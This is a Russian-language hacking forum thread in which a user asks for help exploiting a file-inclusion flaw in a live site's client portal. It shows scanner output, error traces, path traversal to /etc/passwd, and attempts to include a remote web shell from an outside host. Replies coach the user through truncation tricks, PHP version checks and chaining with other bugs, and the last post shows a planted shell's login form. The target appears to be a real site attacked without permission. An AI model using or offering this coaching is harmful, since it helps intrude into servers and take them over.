как быть с этим? File inclusion Vulnerability description This script is possibly vulnerable to file inclusion attacks. It seems that this script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function. This vulnerability affects /client-portal/. Discovered by: Scripting (File_Inclusion.script). Attack details Cookie input FxOACPLang was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg Pattern found: Failed opening required '/home/admin/web/public_html/location/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg.php' Ошибка Warning: require_once(/home/admin/web/site/public_html/client-portal/location/http:/image.php.php): failed to open stream: No such file or directory in /home/admin/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d codeon line 21 Fatal error: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/http://image.php.php' (include_path='.:/usr/share/php:/usr/share/pear') in /home/admin/web/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 21 Пробую вот так ничего не вывыходит( <br /> <b>Fatal error</b>: require_once(): Failed opening required '/home/admin/web/site/public_html/client-portal/location/../../../../../../../etc/passwd' (include_path='.:/usr/share/php:/usr/share/pear') in <b>/home/admin/web/site/public_html/client-portal/initialize.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code</b> on line <b>21</b><br />
Читал,смотрел не получается ((((Подскажите плз что делать Везде в примерах идет ?page=http://site.ru/shell.txt А у меня /location/ Подскажите таким методом /public_html/client-portal/location/http://site/image.txt.php Файл загружается на сервер?
Очевидно же что тут инклуд локальный и расширение файла ".php" (в первом посте видно). В новых версиях пхп его обрезать нельзя емнип, поэтому нужно еще какую-нибудь уязвимость использовать вместе с этой, чтобы код свой выполнить.
Так как им воспользоваться?) я уде все перепробывал.Я чтото делаю не так.Это мой первый инклуд)Ребят помогите плз Я могу открывать только php файлы 400 Bad Request Request Header Or Cookie Too Large nginx это когда 4096 слешей
Во-первых нужно узнать версию php, чтобы понять, можно ли воспользоваться трюком со слешами (там кстати свои особенности). Вот еще хорошая статья: https://intsystem.org/security/issledovanie-php-include/. Вот еще нужно почитать это: https://rdot.org/forum/showthread.php?t=343&page=3. Но самое главное, это то что nginx не принимает такой большой запрос - тут я не знаю как выкрутится, можно попробовать послать POST запрос, если имя файла для подключение берется из $_REQUEST а не из $_GET, в чем я лично сомневаюсь. В любом случае слеш с точками можно через пост попробовать. А так даже не уверен, пусть олдфаги подскажут.
Ну вообще такие вещи неплохо у себя на локалхосте пробовать а не сразу в боевых условиях. А как быть с nginx - не знаю, возможно следует копать в другую сторону: например искать как можно создать файл на сервере с нужным расширением.
С этой версией все безнадежно? Удалось вытащить phpinfo allow_url_fopen On On allow_url_include Off Off always_populate_raw_post_data Off output_buffering 4096 PHP Version 5.4.45-0+deb7u2
Можно было бы попробовать https://xakep.ru/2012/01/25/58183/ , но у тебя расширение фиксированное, поэтому хз что еще посоветовать.
а что тут сделаешь, заливать только файл шел. и инклудить. Хорошо если есть соседи. можно как вариант инклудить соседний сайт. Я так понимаю этот сайт - вопрос жизни и смерти
Подскажите что можно сделать? css.php?f=http://site/shell.php?.css&sid=0 форма входа отображается в виде текста <pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>